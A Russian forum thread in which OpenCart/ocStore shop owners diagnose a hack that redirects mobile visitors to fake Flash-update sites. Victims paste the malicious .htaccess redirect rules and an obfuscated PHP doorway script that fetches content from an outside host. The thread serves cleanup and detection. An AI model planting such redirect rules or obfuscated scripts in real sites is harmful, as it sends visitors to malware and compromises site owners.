сайт недоступен с мобильных устройств-вирус!(((

[02volna]

Всем, здравствуйте!

Помогите разобраться, пожалуйста:

Три сайта на ocStore 1.5.3.1 стали недоступны с мобильных устройств (проверяли с разных планшетов и смартфонов), перенаправляет на левый адрес {mobile-flash.ru}  и просит обновить якобы устаревший flv-плеер.

По совету техподдержки хостинга проверили комп с которого заходили через ftp - чисто, да на нем и антивирус постоянно работает, сменили пароль на ftp-аккаунт, скопировали базу и картинки.

Теперь, собственно надо восстанавливать работоспособность. Знающие люди, подскажите как это можно сделать???

на всякий случай прикрепляю файл .htaccess одного из сайтовhtaccess1.txt

[Baco]

А пациент сам то где находится ? какой модуль использовали для адаптации под планшеты\смартфоны ?

[02volna]

Да, мы собственно ничего не адаптировали специально. Я имею ввиду, что сайты не открыватеся через барузеры типа opera mini. Единственный модуль, который вообще загружался отдельно это экспорт-импорт в ексель, но проблема появилась сильно позже.

[Baco]

Адрес сайта можно узнать ? А то диагноз поставить можно будет только в пятницу... 13-го, в полнолуние...

[02volna]

aquasecret.ru  и 102kid.ru, они по сути одинаковые.

[Baco]

Просмотрел через этот сервис, никаких редиректов не видно.

[afwollis]

а в чем проблема?

возьмите чистый htaccess из архива дистрибутива используемого у вас движка и замените текущий.

[02volna]

а в чем проблема?

возьмите чистый htaccess из архива дистрибутива используемого у вас движка и замените текущий.

Спасибо большое, так и сделала, все работает!!!

Проблема была только в том, что я мало что смыслю в устройстве сайтов)))

А что-то нужно дополнительно предпринимать для того, чтобы избежать подобных неприятностей в дальнейшем? И что это было вообще? Все-таки вирус?

[EVMedvedev]

Спасибо большое, так и сделала, все работает!!!

Проблема была только в том, что я мало что смыслю в устройстве сайтов)))

А что-то нужно дополнительно предпринимать для того, чтобы избежать подобных неприятностей в дальнейшем? И что это было вообще? Все-таки вирус?

 

Надо искать внимательнее. Такие модификации .htaccess сами не происходят. Ищи php-файлы, закрытые обфускатом. Если не все зачистили, то скоро htaccess снова будет загажен. Попробуйте на него хотя бы права сделать только на чтение (хотя вряд ли поможет).

[02volna]

Надо искать внимательнее. Такие модификации .htaccess сами не происходят. Ищи php-файлы, закрытые обфускатом. Если не все зачистили, то скоро htaccess снова будет загажен. Попробуйте на него хотя бы права сделать только на чтение (хотя вряд ли поможет).

 

Спасибо за совет. Хотела уточнить "Закрытые обфускатом" - это что? Совсем некомпетентна в данных вопросах.

[EVMedvedev]

Спасибо за совет. Хотела уточнить "Закрытые обфускатом" - это что? Совсем некомпетентна в данных вопросах.

 

Это когда вместо читабельного php-кода видишь в файле всякие краказябры из-за чего восстановить логику работы кода и суть его действий не просто. Так чаще всего скрывают зловредный код. Иногда правда то же самое делают и для защиты авторских прав, но тогда вы точно знаете об этом потому что сами его покупали.

 

Вот пример закрытого обфускатом кода

<? $GLOBALS['_2061819781_']=Array(base64_decode('cG' .'h' .'waW5mbw==')); ?><? function _1560594550($i){$a=Array();return base64_decode($a[$i]);} ?><?php $GLOBALS['_2061819781_'][0]();

 

Здесь на самом деле зашифровано следующее:

<?php

phpinfo();

 

Можете сами попробовать здесь:

http://wb0.ru/phpobf.php

 

По обфускации можно почитать википедию.

 

Для поиска подобного кода стоит обратить внимание, что часто в таких случаях используются функции eval и base64_decode.

[aachernishev]

Всем, здравствуйте!

Помогите разобраться, пожалуйста:

Три сайта на ocStore 1.5.3.1 стали недоступны с мобильных устройств (проверяли с разных планшетов и смартфонов), перенаправляет на левый адрес {mobile-flash.ru}  и просит обновить якобы устаревший flv-плеер.

По совету техподдержки хостинга проверили комп с которого заходили через ftp - чисто, да на нем и антивирус постоянно работает, сменили пароль на ftp-аккаунт, скопировали базу и картинки.

Теперь, собственно надо восстанавливать работоспособность. Знающие люди, подскажите как это можно сделать???

на всякий случай прикрепляю файл .htaccess одного из сайтовhtaccess1.txt

 

Аналогично.. 

На хостинге 11 сайтов, у всех именно такая проблема появилась одновременно..

Хрень какая-то..

 

htaccess одного из них:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://akoock.ru/ [L,R=302]
# 1.To use URL Alias you need to be running apache with mod_rewrite enabled. 

# 2. In your opencart directory rename htaccess.txt to .htaccess.

# For any support issues please visit: http://www.opencart.com

Options +FollowSymlinks

# Prevent Directoy listing 
Options -Indexes

# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
 Order deny,allow
 Deny from all
</FilesMatch>

# SEO URL Settings
RewriteEngine On
# If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/ 

RewriteBase /
RewriteRule ^sitemap.xml$ index.php?route=feed/google_sitemap [L]
RewriteRule ^googlebase.xml$ index.php?route=feed/google_base [L]
RewriteRule ^download/(.*) /index.php?route=error/not_found [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !.*\.(ico|gif|jpg|jpeg|png|js|css)
RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]

### Additional Settings that may need to be enabled for some servers 
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.

# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
php_flag register_globals off

# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off

# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M

# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M

# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200

# 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200

# 7. disable open_basedir limitations
# php_admin_value open_basedir none

# Prevent Directoy listing 
Options -Indexes

<FilesMatch "\.(xml)">
Order deny,allow
Deny from all
</FilesMatch>

# чтобы ссылки были вида www.ddd.ru
rewritecond %{http_host} ^cl60944.tmweb.ru [nc]
rewriterule ^(.*)$ http://www.cl60944.tmweb.ru/$1 [r=301,nc]

Отличный вариант, конечно, htaccess вернуть к изначальному виду, но 100% снова же повторится, раз сразу все 11 сайтов тю-тю..

Надо как-то найти источник этого безобразия..

Заметил ещё странную вещь:

 

Примерно в то время, как обнаружился вирус пришло 2 заказа одновременно от одного с одного и того же ip, но с разными товарами:

 

Segey

Msk

Msk

Байконур

Российская Федерация

[email protected]

800000000000

IP: 81.26.145.250

 

Причем на этом ip сайт какой то висит..

Хрень какая то

 

Может всё же есть идеи как просканировать файлы на вредоносный код?

Змінено 10 жовтня 2013 користувачем aachernishev

[aachernishev]

 

 

Вот пример закрытого обфускатом кода

<? $GLOBALS['_2061819781_']=Array(base64_decode('cG' .'h' .'waW5mbw==')); ?><? function _1560594550($i){$a=Array();return base64_decode($a[$i]);} ?><?php $GLOBALS['_2061819781_'][0]();

 

Здесь на самом деле зашифровано следующее:

<?php

phpinfo();

 

 

Похоже, что нашел!

/download/content/index.php :

 

<? $GLOBALS['_271667460_']=Array(base64_decode('bHRya' .'W0='),base64_decode('c3' .'RyX3JlcGx' .'hY2' .'U' .'='),base64_decode('' .'c3RycnBvcw' .'=='),base64_decode('c3' .'Vic3Ry'),base64_decode('c3R' .'ydG9sb3dlcg=='),base64_decode('Zml' .'sZQ=='),base64_decode('YXJyYXlfa2V5' .'X' .'2' .'V' .'4a' .'XN0cw=='),base64_decode('' .'aGVhZGVy'),base64_decode('' .'aW1wbG9kZQ=='),base64_decode('ZXh' .'0' .'ZW' .'5' .'zaW9uX2x' .'vYWRl' .'Z' .'A' .'=' .'='),base64_decode('Y3VybF9pbml0'),base64_decode('' .'Y3VybF' .'9z' .'ZX' .'RvcHQ' .'='),base64_decode('Y' .'3V' .'ybF9zZXR' .'v' .'cHQ='),base64_decode('Y' .'3VybF9leGVj'),base64_decode('Y3Vy' .'b' .'F9j' .'bG9zZ' .'Q=='),base64_decode('aG' .'VhZGVy'),base64_decode('aGVhZG' .'Vy')); ?><? function _2059374644($i){$a=Array('dXJs','Lw==','d2luZG93cy0xMjUx','Y3Nz','cG5n','aW1hZ2UvcG5n','anBn','aW1hZ2UvanBlZw==','anBlZw==','aW1hZ2UvanBlZw==','Z2lm','aW1hZ2UvZ2lm','anM=','dGV4dC9qYXZhc2NyaXB0','eG1s','dGV4dC94bWw=','aHR0cDovL3dvd2EyNC5iZ2V0LnJ1L2Rvb3J3YXlzLw==','d3d3Lg==','','Lg==','Lw==','','Y3VybA==','U3RhdHVzOiA0MDQgTm90IEZvdW5k','UEFHRSBOT1QgRk9VTkQ=','U3RhdHVzOiA0MDQgTm90IEZvdW5k','UEFHRSBOT1QgRk9VTkQ=');return base64_decode($a[$i]);} ?><?php $_0=$GLOBALS['_271667460_'][0]($_GET[_2059374644(0)],_2059374644(1));$_1=_2059374644(2);$_2="text/html; charset=$_1";$_3=array(_2059374644(3)=>"text/css; charset=$_1",_2059374644(4)=> _2059374644(5),_2059374644(6)=> _2059374644(7),_2059374644(8)=> _2059374644(9),_2059374644(10)=> _2059374644(11),_2059374644(12)=> _2059374644(13),_2059374644(14)=> _2059374644(15),);$_4=_2059374644(16) .$GLOBALS['_271667460_'][1](_2059374644(17),_2059374644(18),$_SERVER[SERVER_NAME]);$_5=$GLOBALS['_271667460_'][2]($_0,_2059374644(19));$_6=$GLOBALS['_271667460_'][3]($_0,$_5+round(0+0.5+0.5),round(0+249.75+249.75+249.75+249.75));$_7=$GLOBALS['_271667460_'][4]($_6);$_8=$_4 ._2059374644(20) .$_0;$_9=$GLOBALS['_271667460_'][5]($_8);$_10=$GLOBALS['_271667460_'][6]($_7,$_3)?$_3[$_7]:$_2;$GLOBALS['_271667460_'][7]("Content-Type: $_10");if($_9){$_11=$GLOBALS['_271667460_'][8](_2059374644(21),$_9);echo $_11;exit;}elseif($GLOBALS['_271667460_'][9](_2059374644(22))){$_12=$GLOBALS['_271667460_'][10]();$_13=$_8;$GLOBALS['_271667460_'][11]($_12,CURLOPT_URL,$_13);$GLOBALS['_271667460_'][12]($_12,CURLOPT_RETURNTRANSFER,round(0+0.33333333333333+0.33333333333333+0.33333333333333));$_11=$GLOBALS['_271667460_'][13]($_12);$GLOBALS['_271667460_'][14]($_12);if($_11){echo $_11;}else{$GLOBALS['_271667460_'][15](_2059374644(23));echo _2059374644(24);}exit;}else{$GLOBALS['_271667460_'][16](_2059374644(25));echo _2059374644(26);} ?>

 

И вот ещё..

 

 

/download/content/.htaccess

 

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://akoock.ru/ [L,R=302]
php_value error_reporting 0
AddDefaultCharset windows-1251
DirectoryIndex index.php

RewriteEngine On
RewriteBase /download/content

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule index.php.* - [L]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule .* index.php?url=$0 [L,QSA]

 

Я себя поздравляю и всем удачи :)

Змінено 10 жовтня 2013 користувачем aachernishev

[dym]

Та же ерунда. Так еще и признание получил. 

[dym]

Вот то, что я искал! www.virusdie.ru Система все нашла. Рекомендую.

Змінено 25 грудня 2013 користувачем afwollis

[svhost]

ТС, в приложенном файле .htaccess вот этот код отвечает за редиркеты для мобильных устройств:

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iphone|ipad) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://load.getwap.biz/?l&source=.htaccess [L,R=302] # on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://m.extrasoftware.biz/?19&source=77.234.201.53 [L,R=302] # on
